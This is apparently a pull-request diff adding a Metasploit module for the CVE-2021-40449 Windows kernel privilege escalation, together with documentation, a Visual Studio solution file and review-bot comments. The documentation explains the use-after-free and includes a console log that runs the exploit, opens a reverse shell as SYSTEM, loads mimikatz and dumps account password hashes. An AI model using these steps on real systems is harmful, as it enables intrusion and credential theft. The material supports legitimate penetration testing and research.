Land #15834, add CVE-2021-40449 CallbackHell Windows LPE
Showing 6 changed files with 1,226 additions and 0 deletions.
Binary file not shown.
documentation/modules/exploit/windows/local/cve_2021_40449.md (155 changes: 155 additions & 0 deletions)
@@ -0,0 +1,155 @@ | ||
## Vulnerable Application | ||
|
||
A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by | ||
an attacker to escalate privileges to those of `NT AUTHORITY\SYSTEM`. The flaw exists due to the fact | ||
that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers | ||
can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object | ||
that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle | ||
with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the | ||
attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the | ||
kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\SYSTEM. | ||
|
||
This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however | ||
previous versions of Windows 10 will likely also work. | ||
|
||
Note the exploit may occasionally not work the first time so you may have to run it again to get the results. | ||
|
||
## Options | ||
|
||
## Verification Steps | ||
|
||
1. Get a non-SYSTEM meterpreter session on Win10 RS5 x64 | ||
2. `use exploit/windows/local/cve_2021_40449` | ||
3. `set session <session>` | ||
4. `exploit` | ||
5. Get a SYSTEM session | ||
|
||
## Scenarios | ||
|
||
### Windows 10 1809 Build 17763.2114 x64 | ||
|
||
``` | ||
msf6 exploit(multi/handler) > exploit | ||
[*] Started bind TCP handler against 172.28.156.210:4444 | ||
[*] Sending stage (200262 bytes) to 172.28.156.210 | ||
[*] Meterpreter session 1 opened (172.28.145.185:36167 -> 172.28.156.210:4444 ) at 2021-11-05 15:45:08 -0500 | ||
meterpreter > getuid | ||
Server username: DESKTOP-3GHNQ93\normal | ||
meterpreter > getsystem | ||
[-] priv_elevate_getsystem: Operation failed: The system cannot find the file specified. The following was attempted: | ||
[-] Named Pipe Impersonation (In Memory/Admin) | ||
[-] Named Pipe Impersonation (Dropper/Admin) | ||
[-] Token Duplication (In Memory/Admin) | ||
[-] Named Pipe Impersonation (RPCSS variant) | ||
meterpreter > sysinfo | ||
Computer : DESKTOP-3GHNQ93 | ||
OS : Windows 10 (10.0 Build 17763). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 2 | ||
Meterpreter : x64/windows | ||
meterpreter > background | ||
[*] Backgrounding session 1... | ||
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2021_40449 | ||
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp | ||
msf6 exploit(windows/local/cve_2021_40449) > show options | ||
Module options (exploit/windows/local/cve_2021_40449): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
SESSION yes The session to run this module on | ||
Payload options (windows/x64/meterpreter/reverse_tcp): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) | ||
LHOST 172.28.145.185 yes The listen address (an interface may be specified) | ||
LPORT 4444 yes The listen port | ||
Exploit target: | ||
Id Name | ||
-- ---- | ||
0 Windows 10 x64 RS1 (build 14393) and RS5 (build 17763) | ||
msf6 exploit(windows/local/cve_2021_40449) > set SESSION 1 | ||
SESSION => 1 | ||
msf6 exploit(windows/local/cve_2021_40449) > set LPORT 9988 | ||
LPORT => 9988 | ||
msf6 exploit(windows/local/cve_2021_40449) > exploit | ||
[!] SESSION may not be compatible with this module: | ||
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size | ||
[*] Started reverse TCP handler on 172.28.145.185:9988 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
^C[-] Exploit failed [user-interrupt]: Interrupt | ||
[-] exploit: Interrupted | ||
msf6 exploit(windows/local/cve_2021_40449) > exploit | ||
[!] SESSION may not be compatible with this module: | ||
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size | ||
[*] Started reverse TCP handler on 172.28.145.185:9988 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Target's build number: 10.0.17763.2114 | ||
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected! | ||
[*] Launching msiexec to host the DLL... | ||
[+] Process 2520 launched. | ||
[*] Reflectively injecting the DLL into 2520... | ||
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete. | ||
[*] Sending stage (200262 bytes) to 172.28.156.210 | ||
[*] Meterpreter session 2 opened (172.28.145.185:9988 -> 172.28.156.210:49900 ) at 2021-11-05 15:46:21 -0500 | ||
meterpreter > getuid | ||
Server username: NT AUTHORITY\SYSTEM | ||
meterpreter > load kiwi | ||
Loading extension kiwi...c | ||
.#####. mimikatz 2.2.0 20191125 (x64/windows) | ||
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) | ||
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) | ||
## \ / ## > http://blog.gentilkiwi.com/mimikatz | ||
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) | ||
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/ | ||
Success. | ||
meterpreter > creds_all | ||
[+] Running as SYSTEM | ||
[*] Retrieving all credentials | ||
msv credentials | ||
=============== | ||
Username Domain NTLM SHA1 | ||
-------- ------ ---- ---- | ||
normal DESKTOP-3GHNQ93 a38673ad58b19421e952fc317b62c3c4 ccff8cc980f0024dc5b3f925194a35c0fa0231c3 | ||
test DESKTOP-3GHNQ93 0cb6948805f797bf2a82807973b89537 87f8ed9157125ffc4da9e06a7b8011ad80a53fe1 | ||
wdigest credentials | ||
=================== | ||
Username Domain Password | ||
-------- ------ -------- | ||
(null) (null) (null) | ||
DESKTOP-3GHNQ93$ WORKGROUP (null) | ||
normal DESKTOP-3GHNQ93 (null) | ||
test DESKTOP-3GHNQ93 (null) | ||
kerberos credentials | ||
==================== | ||
Username Domain Password | ||
-------- ------ -------- | ||
(null) (null) (null) | ||
desktop-3ghnq93$ WORKGROUP (null) | ||
normal DESKTOP-3GHNQ93 (null) | ||
test DESKTOP-3GHNQ93 (null) | ||
meterpreter > | ||
``` |
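Review bot: the `## Options` heading in this hunk is empty, although the `show options` output further down in the same file shows the module takes a `SESSION` option; either describe `SESSION` under Options or state that the module has no options beyond the standard ones. Two related documentation points on this hunk: the Vulnerable Application paragraph says "previous versions of Windows 10 will likely also work", but the only target listed is "Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)" and the check in the scenario reports "Vulnerable Windows 10 v1809 build detected!", so the doc should say which builds the automatic check actually accepts instead of guessing, and the Verification Steps mention only RS5 while RS1 is also a target. Finally, the first `exploit` run in the scenario was interrupted with ^C and adds nothing, so trim it, and consider dropping the NTLM/SHA1 hashes of the test accounts from the `creds_all` output, since `getuid` returning `NT AUTHORITY\SYSTEM` already demonstrates the escalation.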
external/source/exploits/CVE-2021-40449/CVE-2021-40449.sln (31 changes: 31 additions & 0 deletions)
@@ -0,0 +1,31 @@ | ||
|
||
Microsoft Visual Studio Solution File, Format Version 12.00 | ||
# Visual Studio Version 16 | ||
VisualStudioVersion = 16.0.31729.503 | ||
MinimumVisualStudioVersion = 10.0.40219.1 | ||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2021-40449", "CVE-2021-40449\CVE-2021-40449.vcxproj", "{AF6CB19A-2068-4490-BE5A-710F0AD5C152}" | ||
EndProject | ||
Global | ||
GlobalSection(SolutionConfigurationPlatforms) = preSolution | ||
Debug|x64 = Debug|x64 | ||
Debug|x86 = Debug|x86 | ||
Release|x64 = Release|x64 | ||
Release|x86 = Release|x86 | ||
EndGlobalSection | ||
GlobalSection(ProjectConfigurationPlatforms) = postSolution | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Debug|x64.ActiveCfg = Debug|x64 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Debug|x64.Build.0 = Debug|x64 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Debug|x86.ActiveCfg = Debug|Win32 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Debug|x86.Build.0 = Debug|Win32 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Release|x64.ActiveCfg = Release|x64 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Release|x64.Build.0 = Release|x64 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Release|x86.ActiveCfg = Release|Win32 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Release|x86.Build.0 = Release|Win32 | ||
EndGlobalSection | ||
GlobalSection(SolutionProperties) = preSolution | ||
HideSolutionNode = FALSE | ||
EndGlobalSection | ||
GlobalSection(ExtensibilityGlobals) = postSolution | ||
SolutionGuid = {AF181344-04CA-4E6A-A552-ABA13E6AC54A} | ||
EndGlobalSection | ||
EndGlobal |
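Review bot: the solution defines `Debug|x86` and `Release|x86` configurations (mapped to `Debug|Win32` and `Release|Win32`) although the module's only target in the documentation is "Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)" and the payload shown is `windows/x64/meterpreter/reverse_tcp`; either drop the Win32 configurations so nobody builds an x86 DLL the module never loads, or note in the project that only the x64 Release build is shipped. The `.vcxproj` this solution references (`CVE-2021-40449\CVE-2021-40449.vcxproj`) is not in this view, so compiler and linker settings cannot be checked here; because the commit also ships a binary ("Binary file not shown."), a reviewer should confirm that the checked-in DLL is the x64 Release output of this project and that it can be rebuilt from these sources.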